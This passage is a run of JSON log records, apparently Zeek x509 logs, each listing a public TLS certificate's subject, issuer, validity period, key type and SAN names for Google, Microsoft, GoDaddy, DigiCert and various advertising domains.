AB,C=SE","certificate.not_valid_before":"2000-05-30T17:48:38.000000Z","certificate.not_valid_after":"2020-05-30T17:48:38.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.166295Z","id":"Fhvody4qOTe0mJs3Fk","certificate.version":3,"certificate.serial":"2766EE56EB49F38EABD770A2FC84DE22","certificate.subject":"CN=COMODO RSA Certification Authority,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB","certificate.issuer":"CN=AddTrust External CA Root,OU=AddTrust External TTP Network,O=AddTrust AB,C=SE","certificate.not_valid_before":"2000-05-30T17:48:38.000000Z","certificate.not_valid_after":"2020-05-30T17:48:38.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha384WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.166295Z","id":"Ffjuxm4CvMCIFiaht1","certificate.version":3,"certificate.serial":"2B2E6EEAD975366C148A6EDBA37C8C07","certificate.subject":"CN=COMODO RSA Domain Validation Secure Server CA,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB","certificate.issuer":"CN=COMODO RSA Certification Authority,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB","certificate.not_valid_before":"2014-02-12T08:00:00.000000Z","certificate.not_valid_after":"2029-02-12T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha384WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.166295Z","id":"FuK6rUGErq04oxh2j","certificate.version":3,"certificate.serial":"128A27","certificate.subject":"CN=*.mathtag.com,OU=Domain Control Validated - RapidSSL(R),OU=See www.rapidssl.com/resources/cps (c)14,OU=GT86652527,serialNumber=6p4ff8rvYSGSuelZm80f776/xTo-knaO","certificate.issuer":"CN=RapidSSL CA,O=GeoTrust\u005c, Inc.,C=US","certificate.not_valid_before":"2014-04-30T08:50:56.000000Z","certificate.not_valid_after":"2016-08-01T20:49:41.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.mathtag.com","mathtag.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.149463Z","id":"Fy0aij2Kh38TkAPyDf","certificate.version":3,"certificate.serial":"4371D5952106330D252167FBD3412759AE1E08E1","certificate.subject":"CN=*.msads.net,OU=IT,O=Microsoft Corporation,L=Redmond,ST=WA,C=US","certificate.issuer":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.not_valid_before":"2015-01-23T06:11:52.000000Z","certificate.not_valid_after":"2016-01-23T06:11:50.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.msads.net"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.149463Z","id":"FbvSneNsqlKudesYg","certificate.version":3,"certificate.serial":"0727A46A","certificate.subject":"CN=Verizon Akamai SureServer CA G14-SHA1,OU=Cybertrust,O=Verizon Enterprise Solutions,L=Amsterdam,C=NL","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2014-04-02T21:32:45.000000Z","certificate.not_valid_after":"2021-04-02T21:31:39.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":2} +{"ts":"2018-08-03T23:39:01.149463Z","id":"F67I3soTEf7Wuxi9","certificate.version":3,"certificate.serial":"07278EED","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=GTE CyberTrust Global Root,OU=GTE CyberTrust Solutions\u005c, Inc.,O=GTE Corporation,C=US","certificate.not_valid_before":"2012-04-18T23:36:18.000000Z","certificate.not_valid_after":"2018-08-13T23:35:17.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.159615Z","id":"FJASpYDP9iaWfYbb","certificate.version":3,"certificate.serial":"0B6AA13132F538C8","certificate.subject":"CN=*.g.doubleclick.net,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:32:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.g.doubleclick.net","*.googleadservices.com","*.googlesyndication.com","*.googletagservices.com","*.invitemedia.com","g.doubleclick.net","googleadservices.com","googlesyndication.com","googletagservices.com","media.admob.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.159615Z","id":"FbBqgk2PESXSz4ZdPi","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.159615Z","id":"FQ7lpX3MrYLbpPkkra","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.159615Z","id":"FalbA012cy0inDetL9","certificate.version":3,"certificate.serial":"411BE00632BE6205B646976A18BD3F72","certificate.subject":"CN=eu-gmtdmp.gd1.mookie1.com,OU=TechOps,O=Media Innovation Group\u005c, LLC,L=New York,ST=New York,C=US","certificate.issuer":"CN=Symantec Class 3 Secure Server CA - G4,OU=Symantec Trust Network,O=Symantec Corporation,C=US","certificate.not_valid_before":"2015-04-01T07:00:00.000000Z","certificate.not_valid_after":"2016-04-02T06:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["eu-gmtdmp.gd1.mookie1.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.159615Z","id":"FxJ4oP3WaDylcZSIol","certificate.version":3,"certificate.serial":"513FB9743870B73440418D30930699FF","certificate.subject":"CN=Symantec Class 3 Secure Server CA - G4,OU=Symantec Trust Network,O=Symantec Corporation,C=US","certificate.issuer":"CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=(c) 2006 VeriSign\u005c, Inc. - For authorized use only,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.not_valid_before":"2013-10-31T07:00:00.000000Z","certificate.not_valid_after":"2023-10-31T06:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.159615Z","id":"FtLHUr1DDORYMholHa","certificate.version":3,"certificate.serial":"250CE8E030612E9F2B89F7054D7CF8FD","certificate.subject":"CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=(c) 2006 VeriSign\u005c, Inc. - For authorized use only,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.issuer":"OU=Class 3 Public Primary Certification Authority,O=VeriSign\u005c, Inc.,C=US","certificate.not_valid_before":"2006-11-08T08:00:00.000000Z","certificate.not_valid_after":"2021-11-08T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.145435Z","id":"FKR2hk4mOdnKKBsBC9","certificate.version":3,"certificate.serial":"08457721D8AC28F3","certificate.subject":"CN=*.google.com,O=Google Inc,L=Mountain View,ST=California,C=US","certificate.issuer":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.not_valid_before":"2015-03-25T22:50:35.000000Z","certificate.not_valid_after":"2015-06-23T07:00:00.000000Z","certificate.key_alg":"id-ecPublicKey","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"ecdsa","certificate.key_length":256,"certificate.curve":"prime256v1","san.dns":["*.google.com","*.android.com","*.appengine.google.com","*.cloud.google.com","*.google-analytics.com","*.google.ca","*.google.cl","*.google.co.in","*.google.co.jp","*.google.co.uk","*.google.com.ar","*.google.com.au","*.google.com.br","*.google.com.co","*.google.com.mx","*.google.com.tr","*.google.com.vn","*.google.de","*.google.es","*.google.fr","*.google.hu","*.google.it","*.google.nl","*.google.pl","*.google.pt","*.googleadapis.com","*.googleapis.cn","*.googlecommerce.com","*.googlevideo.com","*.gstatic.cn","*.gstatic.com","*.gvt1.com","*.gvt2.com","*.metric.gstatic.com","*.urchin.com","*.url.google.com","*.youtube-nocookie.com","*.youtube.com","*.youtubeeducation.com","*.ytimg.com","android.com","g.co","goo.gl","google-analytics.com","google.com","googlecommerce.com","urchin.com","youtu.be","youtube.com","youtubeeducation.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.145435Z","id":"FRLSBd1Z2WoacbssU7","certificate.version":3,"certificate.serial":"023A76","certificate.subject":"CN=Google Internet Authority G2,O=Google Inc,C=US","certificate.issuer":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.not_valid_before":"2013-04-05T22:15:55.000000Z","certificate.not_valid_after":"2017-01-01T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.145435Z","id":"FuA0jf2DkdGhM8RyKi","certificate.version":3,"certificate.serial":"12BBE6","certificate.subject":"CN=GeoTrust Global CA,O=GeoTrust Inc.,C=US","certificate.issuer":"OU=Equifax Secure Certificate Authority,O=Equifax,C=US","certificate.not_valid_before":"2002-05-21T11:00:00.000000Z","certificate.not_valid_after":"2018-08-21T11:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.160545Z","id":"FxBdBZ3rc1RM3N1uQ2","certificate.version":3,"certificate.serial":"0414318C84EE89","certificate.subject":"CN=*.skimresources.com,O=Skimbit ltd,L=London,ST=London,C=GB","certificate.issuer":"serialNumber=07969287,CN=Go Daddy Secure Certification Authority,OU=http://certificates.godaddy.com/repository,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2013-10-28T21:36:09.000000Z","certificate.not_valid_after":"2015-10-28T21:36:09.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.skimresources.com","skimresources.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.160545Z","id":"FBlKOv2zf1ifeRghvj","certificate.version":3,"certificate.serial":"0301","certificate.subject":"serialNumber=07969287,CN=Go Daddy Secure Certification Authority,OU=http://certificates.godaddy.com/repository,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2006-11-16T09:54:37.000000Z","certificate.not_valid_after":"2026-11-16T09:54:37.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.160545Z","id":"FM2PLP3t725aWKFiK7","certificate.version":3,"certificate.serial":"00","certificate.subject":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2004-06-30T00:06:20.000000Z","certificate.not_valid_after":"2034-06-30T00:06:20.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"3","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.160545Z","id":"FizhLj2QZxtH1zbSu1","certificate.version":3,"certificate.serial":"67FBBC6F0001000077AF","certificate.subject":"CN=flex.msn.com,OU=Adcenter,O=Microsoft,L=Redmond,ST=WA,C=US","certificate.issuer":"CN=MSIT Machine Auth CA 2,DC=redmond,DC=corp,DC=microsoft,DC=com","certificate.not_valid_before":"2013-06-06T00:09:06.000000Z","certificate.not_valid_after":"2015-06-06T00:09:06.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537"} +{"ts":"2018-08-03T23:39:01.160545Z","id":"F2XISS3HDeKOAatC3d","certificate.version":3,"certificate.serial":"615DAAD2000600000040","certificate.subject":"CN=MSIT Machine Auth CA 2,DC=redmond,DC=corp,DC=microsoft,DC=com","certificate.issuer":"CN=Microsoft Internet Authority","certificate.not_valid_before":"2012-05-16T03:40:55.000000Z","certificate.not_valid_after":"2016-05-16T03:50:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.160545Z","id":"FKBnXX1W63C3ZPSOwi","certificate.version":3,"certificate.serial":"07276FAE","certificate.subject":"CN=Microsoft Internet Authority","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2012-04-26T00:41:36.000000Z","certificate.not_valid_after":"2020-04-26T00:40:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":1} +{"ts":"2018-08-03T23:39:01.168879Z","id":"F43NAA3Y4ddr0qXOH1","certificate.version":3,"certificate.serial":"040BADEF96727E","certificate.subject":"CN=l.betrad.com,OU=Domain Control Validated","certificate.issuer":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2014-06-24T02:15:06.000000Z","certificate.not_valid_after":"2017-06-25T01:24:20.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["l.betrad.com","www.l.betrad.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.168879Z","id":"FM7M2O2YuqTXgTvgkj","certificate.version":3,"certificate.serial":"07","certificate.subject":"CN=Go Daddy Secure Certificate Authority - G2,OU=http://certs.godaddy.com/repository/,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.not_valid_before":"2011-05-03T14:00:00.000000Z","certificate.not_valid_after":"2031-05-03T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.168879Z","id":"FQwZ9Q3iKrQddBBcOg","certificate.version":3,"certificate.serial":"1BE715","certificate.subject":"CN=Go Daddy Root Certificate Authority - G2,O=GoDaddy.com\u005c, Inc.,L=Scottsdale,ST=Arizona,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2014-01-01T15:00:00.000000Z","certificate.not_valid_after":"2031-05-30T14:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.168879Z","id":"FWnxCg1OpG41Punlp5","certificate.version":3,"certificate.serial":"00","certificate.subject":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.issuer":"OU=Go Daddy Class 2 Certification Authority,O=The Go Daddy Group\u005c, Inc.,C=US","certificate.not_valid_before":"2004-06-30T00:06:20.000000Z","certificate.not_valid_after":"2034-06-30T00:06:20.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"3","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.168879Z","id":"FfGYwK34KrzfteBca4","certificate.version":3,"certificate.serial":"67FBBC6F0001000077AF","certificate.subject":"CN=flex.msn.com,OU=Adcenter,O=Microsoft,L=Redmond,ST=WA,C=US","certificate.issuer":"CN=MSIT Machine Auth CA 2,DC=redmond,DC=corp,DC=microsoft,DC=com","certificate.not_valid_before":"2013-06-06T00:09:06.000000Z","certificate.not_valid_after":"2015-06-06T00:09:06.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537"} +{"ts":"2018-08-03T23:39:01.168879Z","id":"FCVim22sPJwSVEehQ","certificate.version":3,"certificate.serial":"615DAAD2000600000040","certificate.subject":"CN=MSIT Machine Auth CA 2,DC=redmond,DC=corp,DC=microsoft,DC=com","certificate.issuer":"CN=Microsoft Internet Authority","certificate.not_valid_before":"2012-05-16T03:40:55.000000Z","certificate.not_valid_after":"2016-05-16T03:50:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.168879Z","id":"FkDzN7nx12zX8uuEj","certificate.version":3,"certificate.serial":"07276FAE","certificate.subject":"CN=Microsoft Internet Authority","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2012-04-26T00:41:36.000000Z","certificate.not_valid_after":"2020-04-26T00:40:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":1} +{"ts":"2018-08-03T23:39:01.153007Z","id":"Fw33BI0z04kSPO8b3","certificate.version":3,"certificate.serial":"020000B9","certificate.subject":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2000-05-13T01:46:00.000000Z","certificate.not_valid_after":"2025-05-13T06:59:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":3} +{"ts":"2018-08-03T23:39:01.153007Z","id":"FFU64N2CWEqnm4WOgj","certificate.version":3,"certificate.serial":"4C229DB1","certificate.subject":"CN=*.pxl.ace.advertising.com,OU=AOL Advertising,O=AOL Inc.,L=Dulles,ST=Virginia,C=US","certificate.issuer":"CN=Entrust Certification Authority - L1C,OU=(c) 2009 Entrust\u005c, Inc.,OU=www.entrust.net/rpa is incorporated by reference,O=Entrust\u005c, Inc.,C=US","certificate.not_valid_before":"2014-04-08T02:29:30.000000Z","certificate.not_valid_after":"2017-04-08T16:47:44.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.pxl.ace.advertising.com","pxl.ace.advertising.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.153007Z","id":"FtBa0y3V5LviMPMfPj","certificate.version":3,"certificate.serial":"4C0E8C39","certificate.subject":"CN=Entrust Certification Authority - L1C,OU=(c) 2009 Entrust\u005c, Inc.,OU=www.entrust.net/rpa is incorporated by reference,O=Entrust\u005c, Inc.,C=US","certificate.issuer":"CN=Entrust.net Certification Authority (2048),OU=(c) 1999 Entrust.net Limited,OU=www.entrust.net/CPS_2048 incorp. by ref. (limits liab.),O=Entrust.net","certificate.not_valid_before":"2011-11-11T23:40:40.000000Z","certificate.not_valid_after":"2021-11-12T10:51:17.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.165044Z","id":"FTYG4E3PRlQ7JFxP88","certificate.version":3,"certificate.serial":"6ECC7AA5A7032009B8CEBCF4E952D491","certificate.subject":"CN=VeriSign Class 3 Secure Server CA - G3,OU=Terms of use at https://www.verisign.com/rpa (c)10,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.issuer":"CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=(c) 2006 VeriSign\u005c, Inc. - For authorized use only,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.not_valid_before":"2010-02-08T08:00:00.000000Z","certificate.not_valid_after":"2020-02-08T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.165044Z","id":"F1rSup3pbCLnIzJzQc","certificate.version":3,"certificate.serial":"250CE8E030612E9F2B89F7054D7CF8FD","certificate.subject":"CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=(c) 2006 VeriSign\u005c, Inc. - For authorized use only,OU=VeriSign Trust Network,O=VeriSign\u005c, Inc.,C=US","certificate.issuer":"OU=Class 3 Public Primary Certification Authority,O=VeriSign\u005c, Inc.,C=US","certificate.not_valid_before":"2006-11-08T08:00:00.000000Z","certificate.not_valid_after":"2021-11-08T07:59:59.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.165044Z","id":"FtjCvE4Jq5HEkQOZq6","certificate.version":3,"certificate.serial":"038259F1766601532AC10AFD0AF7EAD0","certificate.subject":"CN=ibeu2.mookie1.com,O=I-Behavior\u005c, Inc,L=Louisville,ST=Colorado,C=US","certificate.issuer":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2013-01-09T08:00:00.000000Z","certificate.not_valid_after":"2016-03-14T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["ibeu2.mookie1.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.165044Z","id":"FTTFLr3IEw9AlLIdNk","certificate.version":3,"certificate.serial":"0851F959814145CABDE024E212C9C20E","certificate.subject":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert High Assurance EV Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2007-04-03T07:00:00.000000Z","certificate.not_valid_after":"2022-04-03T07:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true} +{"ts":"2018-08-03T23:39:01.165044Z","id":"FidXPL1A1gz6fxHZBd","certificate.version":3,"certificate.serial":"3599B31300010000D76F","certificate.subject":"CN=*.pipe.skype.com","certificate.issuer":"CN=MSIT Machine Auth CA 2,DC=redmond,DC=corp,DC=microsoft,DC=com","certificate.not_valid_before":"2014-04-10T04:56:49.000000Z","certificate.not_valid_after":"2016-04-09T04:56:49.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","san.dns":["*.pipe.skype.com","pipe.skype.com"]} +{"ts":"2018-08-03T23:39:01.165044Z","id":"FfA7XH2aZUPA6ipWOh","certificate.version":3,"certificate.serial":"615DAAD2000600000040","certificate.subject":"CN=MSIT Machine Auth CA 2,DC=redmond,DC=corp,DC=microsoft,DC=com","certificate.issuer":"CN=Microsoft Internet Authority","certificate.not_valid_before":"2012-05-16T03:40:55.000000Z","certificate.not_valid_after":"2016-05-16T03:50:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.165044Z","id":"FvbTOn1KuMzgLE28Y6","certificate.version":3,"certificate.serial":"07276FAE","certificate.subject":"CN=Microsoft Internet Authority","certificate.issuer":"CN=Baltimore CyberTrust Root,OU=CyberTrust,O=Baltimore,C=IE","certificate.not_valid_before":"2012-04-26T00:41:36.000000Z","certificate.not_valid_after":"2020-04-26T00:40:55.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha1WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":1} +{"ts":"2018-08-03T23:39:01.168537Z","id":"FNZMJ7NHnvcuFcLSd","certificate.version":3,"certificate.serial":"0825F98D3918A49141137803A26A1FD0","certificate.subject":"CN=exchange.pulsepoint.com,O=Pulsepoint\u005c, Inc.,L=New York,ST=New York,C=US","certificate.issuer":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","certificate.not_valid_before":"2014-02-28T08:00:00.000000Z","certificate.not_valid_after":"2017-05-17T19:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":4096,"certificate.exponent":"65537","san.dns":["exchange.pulsepoint.com","tag.contextweb.com","bh.contextweb.com","tr.contextweb.com","cdslog.contextweb.com","media.contextweb.com","ds.contextweb.com","openrtb.contextweb.com","rts.contextweb.com","t.lga.contextweb.com","b.lga.contextweb.com","tr.lga.contextweb.com","ads.contextweb.com"],"basic_constraints.ca":false} +{"ts":"2018-08-03T23:39:01.168537Z","id":"FCEa6q3ljZaPBIEFc7","certificate.version":3,"certificate.serial":"01FDA3EB6ECA75C888438B724BCFBC91","certificate.subject":"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US","certificate.issuer":"CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US","certificate.not_valid_before":"2013-03-08T20:00:00.000000Z","certificate.not_valid_after":"2023-03-08T20:00:00.000000Z","certificate.key_alg":"rsaEncryption","certificate.sig_alg":"sha256WithRSAEncryption","certificate.key_type":"rsa","certificate.key_length":2048,"certificate.exponent":"65537","basic_constraints.ca":true,"basic_constraints.path_len":0} +{"ts":"2018-08-03T23:39:01.168537Z","id":"FsJQ4i1dUY8W4jfp95","certificate.version":3,"certificate.serial":"052B4B900741FFC9A15C212D27C88656","certificate.subject":"CN=*.agkn.com,O=Aggregate Knowledge\u005c, Inc.,L=San Mateo,ST=California,C=US","certificate.issuer":"CN=DigiCert High Assurance CA-3,OU=www.digicert.com,O=DigiCert 